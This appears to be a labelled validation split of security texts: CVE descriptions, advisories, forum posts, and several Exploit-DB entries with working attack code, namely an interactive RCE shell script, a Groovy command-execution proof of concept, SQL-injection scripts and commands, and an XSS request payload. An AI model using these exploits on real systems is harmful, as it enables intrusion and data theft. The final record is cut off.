+{"id": "2302b6c33aa9e0548036", "text": "CVE: CVE-2022-35948\n\n[{'lang': 'en', 'value': \"undici is an HTTP/1.1 client, written from scratch for Node.js.`=< undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header. Example: ``` import { request } from 'undici' const unsanitizedContentTypeInput = 'application/json\\\\r\\\\n\\\\r\\\\nGET /foo2 HTTP/1.1' await request('http://localhost:3000, { method: 'GET', headers: { 'content-type': unsanitizedContentTypeInput }, }) ``` The above snippet will perform two requests in a single `request` API call: 1) `http://localhost:3000/` 2) `http://localhost:3000/foo2` This issue was patched in Undici v5.8.1. Sanitize input when sending content-type headers using user input as a workaround.\"}]\n\nFix commit: Merge pull request from GHSA-f772-66g8-q5h3", "source": "cvefixes", "timestamp": "2022-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "30e4efff14748c99eec5", "text": "wifite issue\n\ni use to run wifite before actually am a newbie i used to hack my own wifi for fun it used to crack well.But from few days i can’t crack the same wifi actually the process is running i mean all the 5 attacks but still can’t crack the same wifi password even tried deauthentication attack too no use.", "source": "parrotsec", "timestamp": "2023-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f1520280eba9173a0f5c", "text": "I’m new to this forum,but i would like to state the following: When there’s a good method/tool…will get burned by kiddies using Virustotal and others.", "source": "hackersploit", "timestamp": "2022-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "644aacce2e383e4f87fb", "text": "Htb ctf\n\nWhy does it say for CTF that every “public” CTF requires an input key? It wouldn’t make sense for it to be public if you require a key that needs to be given to you. Edit: I say “every” because I’m talking about all the ongoing and upcoming CTF.", "source": "hackthebox", "timestamp": "2023-04-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6f34ae99becc3c6d4562", "text": "Improper JWT Signature Validation in SAP Security Services Library \n\n[Severity: CRITICAL]\n\n### Impact\nSAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) allows under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.\n\n### Patches\nUpgrade to patched version >= 2.17.0 or >= 3.3.0 \nWe always recommend to upgrade to the latest released version.\n\n### Workarounds\nNo workarounds\n\n### References\nhttps://www.cve.org/CVERecord?id=CVE-2023-50422\n", "source": "github_advisory", "timestamp": "2023-12-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ff4108ff70d7e76fbee2", "text": "Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)\n\n# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)\n# Date: 28/03/2022\n# Exploit Author: sharkmoos & BallO\n# Vendor Homepage: https://www.kramerav.com/\n# Software Link: https://www.kramerav.com/us/product/viaware\n# Version: 2.5.0719.1034\n# Tested on: ViaWare Go (Windows 10)\n# CVE : CVE-2019-17124\n\nimport requests, sys, urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef adminLogin(s, host, username, password):\n headers = {\n \"Host\": f\"{host}\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"en-GB,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Origin\": f\"https://{host}\",\n \"Referer\": f\"https://{host}/admin/login.php\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-User\": \"?1\",\n \"Sec-Gpc\": \"1\",\n \"Te\": \"trailers\",\n \"Connection\": \"close\"\n }\n data = {\n \"txtUserId\": username,\n \"txtPwd\": password,\n \"btnOk\" :\"Login\"\n }\n response = s.post(f\"https://{host}/admin/login.php\", verify=False)\n if len(s.cookies) < 1:\n return False\n else:\n return True\n\n\ndef writeCommand(session, host, command):\n headers = {\n \"Host\": f\"{host}\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n \"Accept\": \"text/html, */*\",\n \"Accept-Language\": \"en-GB,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Origin\": f\"https://{host}\",\n \"Referer\": f\"https://{host}/browseSystemFiles.php?path=C:\\Windows&icon=browser\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Gpc\": \"1\",\n \"Te\": \"trailers\",\n \"Connection\": \"close\"\n }\n data = {\n \"radioBtnVal\":f\"{command}\",\n \"associateFileName\": \"C:/tc/httpd/cgi-bin/exploit.cmd\"\n }\n session.post(f\"https://{host}/ajaxPages/writeBrowseFilePathAjax.php\", headers=headers, data=data)\n\n\ndef getResult(session, host):\n file = session.get(f\"https://{host}/cgi-bin/exploit.cmd\", verify=False)\n pageText = file.text\n if len(pageText) < 1:\n result = \"Command did not return a result\"\n else:\n result = pageText\n return result\n\n\n\ndef main(host, username=\"su\", password=\"supass\"):\n s = requests.Session()\n # comment this line to skip the login stage\n loggedIn = adminLogin(s, host, username, password)\n\n if not loggedIn:\n print(\"Could not successfully login as the admin\")\n sys.exit(1)\n else:\n pass\n\n command = \"\"\n while command != \"exit\":\n command = input(\"cmd:> \").strip()\n writeCommand(s, host, command)\n print(getResult(s, host))\n exit()\n\nif __name__ == \"__main__\":\n\n args = sys.argv\n numArgs = len(args)\n if numArgs < 2:\n print(f\"Run script in format:\\n\\n\\tpython3 {args[0]} target\\n\")\n print(f\"[Optional] Provide Admin Credentials\\n\\n\\tpython3 {args[0]} target su supass\")\n if numArgs == 2:\n main(args[1])\n if numArgs == 4:\n main(args[1], args[2], args[3])\n if numArgs > 4:\n print(f\"Run script in format:\\n\\n\\tpython3 {args[0]} target\\n\")\n print(f\"[Optional] Provide Admin Credentials\\n\\n\\tpython3 {args[0]} target su supass\")", "source": "exploitdb", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "55af3f24e50e437b4f44", "text": "[Business Logic Errors] CVE-2023-23914: HSTS ignored on multiple requests\n\ncurl's HSTS functionality fail when multiple URLs are requested serially.\n\nUsing its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however suprisingly be ignored by subsequent transfers when done on the same command line because the state would not be properly carried on.\n\n## Impact\n\nBypass intended security control.", "source": "hackerone", "timestamp": "2023-02-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4f70b59642aa7e524ee4", "text": "check other users! Some of them have some files that you might be able to see!", "source": "hackthebox", "timestamp": "2023-02-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1f5a9392a12915100aa5", "text": "This looks very handy, i’m going to have a play with this tomorrow.", "source": "hackthebox", "timestamp": "2022-05-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8e80a3724e0a38bd738a", "text": "CVE: CVE-2022-31081\n\n[{'lang': 'en', 'value': \"HTTP::Daemon is a simple http server class written in perl. Versions prior to 6.15 are subject to a vulnerability which could potentially be exploited to gain privileged access to APIs or poison intermediate caches. It is uncertain how large the risks are, most Perl based applications are served on top of Nginx or Apache, not on the `HTTP::Daemon`. This library is commonly used for local development and tests. Users are advised to update to resolve this issue. Users unable to upgrade may add additional request handling logic as a mitigation. After calling `my $rqst = $conn->get_request()` one could inspect the returned `HTTP::Request` object. Querying the 'Content-Length' (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities that should be dealt with by a `400` response. Expected strings of 'Content-Length' SHOULD consist of either a single non-negative integer, or, a comma separated repetition of that number. (that is `42` or `42, 42, 42`). Anything else MUST be rejected.\"}]\n\nFix commit: Include reason in response body content", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6f351b10914856ddd7d7", "text": "Cross-site Scripting in Jenkins Dynamic Extended Choice Parameter Plugin\n\n[Severity: HIGH]\n\nJenkins Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape the name and description of Moded Extended Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4ec93fb14f76163921f6", "text": "Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts\n\n# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts\n# Date: 28/04/2023\n# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl\n# Vendor Homepage: https://jedox.com\n# Version: Jedox 2020.2 (20.2.5) and older\n# CVE : CVE-2022-47876\n\n\nIntroduction\n=================\nJedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.\n\n\nWrite-Up\n=================\nSee [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.\n\n\nProof of Concept\n=================\n1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:\n\n\tdef sout = new StringBuilder(), serr = new StringBuilder()\n\tdef proc = 'whoami'.execute()\n\tproc.consumeProcessOutput(sout, serr)\n\tproc.waitForOrKill(10000)\n\tLOG.error(sout.toString());\n\tLOG.error(serr.toString());", "source": "exploitdb", "timestamp": "2023-05-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c2840f94ae1ded0e97b9", "text": "@bite-sized-privilege , the package that you mentioned (FatRat) isn’t part of Parrot Security by default . You may check their documentation for better understanding on how to make that work .", "source": "parrotsec", "timestamp": "2022-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e6eb9eb6fcaa05e4604b", "text": "CVE: CVE-2021-23495\n\n[{'lang': 'en', 'value': 'The package karma before 6.3.16 are vulnerable to Open Redirect due to missing validation of the return_url query parameter.'}]\n\nFix commit: fix(security): mitigate the \"Open Redirect Vulnerability\"", "source": "cvefixes", "timestamp": "2022-02-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9ed631f8c68753658459", "text": "Solved. Click on all buttons (Copy, Move). Find the right place (Can be at the start of the file) to put injection operators ( | || %0a). Bypass filters for c\"o\"m\"m\"a\"n\"d and filtered characters . Find the good syntax to read the flag Message me if you need hint", "source": "hackthebox", "timestamp": "2023-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "496114806dcc2d7e9e1b", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Internet Explorer 9, ChakraCore, Internet Explorer 11, Microsoft Edge, Internet Explorer 10. This CVE ID is unique from CVE-2018-0945, CVE-2018-0946, CVE-2018-0951, CVE-2018-0953, CVE-2018-0955, CVE-2018-1022, CVE-2018-8114, CVE-2018-8122, CVE-2018-8128, CVE-2018-8137, CVE-2018-8139.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "958e12c156102c86a6d5", "text": "Yeah car hacking is definitely one of the more challenging spaces. I guess it comes down to what your goals are. What you research for learning how to exploit key-fobs would entirely different from something like modify the ECU’s performance maps. CAN Bus would be a good place to start. The tools will make more sense of you at least have a basic understanding of the underlying protocol running on cars’", "source": "parrotsec", "timestamp": "2023-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7a186410d2d30a76b363", "text": "WP AutoComplete 1.0.4 - Unauthenticated SQLi\n\n# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi\n# Date: 30/06/2023\n# Exploit Author: Matin nouriyan (matitanium)\n# Version: <= 1.0.4\n# CVE: CVE-2022-4297\nVendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/\n# Tested on: Kali linux\n\n---------------------------------------\n\n\nThe WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise\nand escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,\nleading to an unauthenticated SQL injection\n\n--------------------------------------\n\nHow to Reproduce this Vulnerability:\n\n1. Install WP AutoComplete <= 1.0.4\n2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests\n3. Find requests belong to WP AutoComplete like step 5\n4. Start sqlmap and exploit\n5. python3 sqlmap.py -u \"https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]\" --random-agent --level=5 --risk=2 -p q", "source": "exploitdb", "timestamp": "2023-07-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e695648c0c8e36069251", "text": "Initially I did it a bit different: mov rcx, 14 mov rdx, rsp loopStack: mov rdi, [rdx] xor rdi, rbx add rdx, 8 loop loopStack but it did not work. I see some kind of new shell, but typing any letter throws an error. Then I tried what @XSSDoctor suggested and it gave me the same HEX line (‘4831…0f05’), so it’s still does not work. Could anyone please help? Maybe there’s something special in how you feed this line to ‘loader.py’?", "source": "hackthebox", "timestamp": "2023-06-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a7de11ce21d61a07043c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the Chakra scripting engine handles objects in memory, aka \"Chakra Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2018-0872, CVE-2018-0873, CVE-2018-0874, CVE-2018-0930, CVE-2018-0933, CVE-2018-0934, CVE-2018-0936, and CVE-2018-0937.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ffeff8fdcfce36928578", "text": "Potential leak of NuGet.org API key\n\n[Severity: MEDIUM]\n\n### Description \n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 6.0 and .NET Core 3.1, NuGet (NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat version range from 3.5.0 to 6.2.0). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET 6.0, .NET Core 3.1, and NuGet (NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat version range from 3.5.0 to 6.2.0) where a nuget.org api key could leak due to an incorrect comparison with a server url.\n\n### Affected software \n\n#### NuGet & NuGet Packages\n\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 6.2.0 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 6.0.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 5.11.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 5.9.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 5.7.1 version or earlier.\n- Any NuGet.exe, NuGet.Commands, NuGet.CommandLine, NuGet.CommandLine.XPlat 4.9.4 version or earlier.\n\n#### .NET SDK(s)\n\n- Any .NET 6.0 application running on .NET 6.0.5 or earlier.\n- Any .NET 3.1 application running on .NET Core 3.1.25 or earlier.\n\n### Patches \n\n- If you're using NuGet.exe 6.2.0 or lower, you should download and install 6.2.1 from https://dist.nuget.org/win-x86-commandline/v6.2.1/nuget.exe. \n\n- If you're using NuGet.exe 6.0.1 or lower, you should download and install 6.0.2 from https://dist.nuget.org/win-x86-commandline/v6.0.2/nuget.exe. \n\n- If you're using NuGet.exe 5.11.1 or lower, you should download and install 5.11.2 from https://dist.nuget.org/win-x86-commandline/v5.11.2/nuget.exe. \n\n- If you're using NuGet.exe 5.9.1 or lower, you should download and install 5.9.2 from https://dist.nuget.org/win-x86-commandline/v5.9.2/nuget.exe. \n\n- If you're using NuGet.exe 5.7.1 or lower, you should download and install 5.7.2 from https://dist.nuget.org/win-x86-commandline/v4.7.2/nuget.exe. \n\n- If you're using NuGet.exe 4.9.4 or lower, you should download and install 4.9.5 from https://dist.nuget.org/win-x86-commandline/v4.9.5/nuget.exe. \n\n- If you're using .NET Core 6.0, you should download and install Runtime 6.0.6 or SDK 6.0.106 (for Visual Studio 2022 v17.0) or SDK 6.0.301 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. \n\n- If you're using .NET Core 3.1, you should download and install Runtime 3.1.26 or SDK 3.1.420 (for Visual Studio 2019 v16.9 or Visual Studio 2011 16.11 or Visual Studio 2022 17.0 or Visual Studio 2022 17.1 ) from https://dotnet.microsoft.com/download/dotnet-core/3.1 \n\n.NET 6.0 and .NET Core 3.1 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. \n\n### Other Details \n\nAnnouncement for this issue can be found at https://github.com/NuGet/Announcements/issues/62\n \nMSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30184", "source": "github_advisory", "timestamp": "2022-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8828b3fea810e510ca7d", "text": "Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)\n\n# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)\n# Exploit Author: omurugur\n# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117\n# Version: 10.7.4-10.7.13\n# Tested on: [relevant os]\n# CVE : CVE-2022-25630\n# Author Web: https://www.justsecnow.com\n# Author Social: @omurugurrr\n\n\nAn authenticated user can embed malicious content with XSS into the admin\ngroup policy page.\n\nExample payload\n\n*\"/>*\n\n\nPOST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo\nHTTP/1.1\nHost: X.X.X.X\nCookie: JSESSIONID=xxxxx\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)\nGecko/20100101 Firefox/99.0\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 652\nOrigin: https://x.x.x.x\nReferer:\nhttps://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nTe: trailers\nConnection: close\n\npageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000\n\n\nRegards,\n\nOmur UGUR", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8b48959e83c09fc99448", "text": "@DANGERLORD , you may also try Parrot OS’s default installed tool “Take Screenshot” (Round disc icon in Menu) to take screenshots easily.", "source": "parrotsec", "timestamp": "2022-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d21d31c71406b43b5eef", "text": "Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)\n\n# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)\n# Date 30.01.2022\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/\n# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip\n# Version: <= 2.0.2\n# Tested on: Ubuntu 20.04\n# CVE: CVE-2015-9323\n# CWE: CWE-89\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md\n\n'''\nDescription:\nThe 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.\n'''\n\nbanner = '''\n\n .o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b.\nd8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D\n8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY'\n8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b.\nY8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D\n `Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P'\n\n [+] 404 to 301 - SQL-Injection\n [@] Developed by Ron Jost (Hacker5preme)\n\n'''\nprint(banner)\n\nimport argparse\nimport os\nimport requests\nfrom datetime import datetime\nimport json\n\n# User-Input:\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\nprint('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))\n\n\n# Authentication:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\ncheck = session.get(auth_url)\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Log In',\n 'testcookie': '1'\n}\nauth = session.post(auth_url, headers=header, data=body)\n\n# SQL-Injection (Exploit):\n\n# Generate payload for sqlmap\nprint ('[+] Payload for sqlmap exploitation:')\ncookies_session = session.cookies.get_dict()\ncookie = json.dumps(cookies_session)\ncookie = cookie.replace('\"}','')\ncookie = cookie.replace('{\"', '')\ncookie = cookie.replace('\"', '')\ncookie = cookie.replace(\" \", '')\ncookie = cookie.replace(\":\", '=')\ncookie = cookie.replace(',', '; ')\n\nexploit_url = r'sqlmap -u \"http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1\"'\nexploit_risk = ' --level 2 --risk 2'\nexploit_cookie = r' --cookie=\"' + cookie + r'\" '\n\nprint(' Sqlmap options:')\nprint(' -a, --all Retrieve everything')\nprint(' -b, --banner Retrieve DBMS banner')\nprint(' --current-user Retrieve DBMS current user')\nprint(' --current-db Retrieve DBMS current database')\nprint(' --passwords Enumerate DBMS users password hashes')\nprint(' --tables Enumerate DBMS database tables')\nprint(' --columns Enumerate DBMS database table column')\nprint(' --schema Enumerate DBMS schema')\nprint(' --dump ", "source": "exploitdb", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e3299be2ee8bf4b9582a", "text": "A lot. Google is yr friend they say. Forbes Microsoft Confirms Seven Critical Windows 10 Vulnerabilities, And Attackers... Microsoft confirms a total of seven critical Windows 10 security vulnerabilities and two 'zero-days' that are being actively exploited cvedetails.com Microsoft Windows 10 : CVE security vulnerabilities, versions and detailed... Microsoft Windows 10 security vulnerabilities, exploits, metasploit modules, vulnerability statistics and list of versions etc…", "source": "hackersploit", "timestamp": "2022-08-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "92f4941bcf95011c8915", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in Microsoft Edge in the way that the Chakra JavaScript engine renders when handling objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This CVE ID is unique from CVE-2017-0224, CVE-2017-0228, CVE-2017-0229, CVE-2017-0230, CVE-2017-0235, CVE-2017-0236, and CVE-2017-0238.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9e49c54957b90b8544b9", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7c2d788211df177f0cf7", "text": "Microsoft Security Advisory CVE-2023-36793: .NET Remote Code Execution Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-36793: .NET Remote Code Execution Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in Microsoft.DiaSymReader.Native.amd64.dll when reading a corrupted PDB file which may lead to remote code execution. This issue only affects Windows systems.\n\n**Note:** The vulnerabilities [CVE-2023-36792]( https://www.cve.org/CVERecord?id=CVE-2023-36792), [CVE-2023-36793]( https://www.cve.org/CVERecord?id=CVE-2023-36793), [CVE-2023-36792]( https://www.cve.org/CVERecord?id=CVE-2023-36794), [CVE-2023-36796]( https://www.cve.org/CVERecord?id=CVE-2023-36796) are all resolved by a single patch. Get [affected software](#affected-software) to resolve all of them.\n\n## Discussion\n\nDiscussion for this issue can be found at https://github.com/dotnet/runtime/issues/91947\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n\n* Any .NET 7.0 application running on .NET 7.0.10 or earlier.\n* Any .NET 6.0 application running on .NET 6.0.21 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.NETCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.10 | 7.0.11\n[Microsoft.NETCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.10 | 7.0.11\n[Microsoft.NETCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.10 | 7.0.11\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.NETCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.21 | 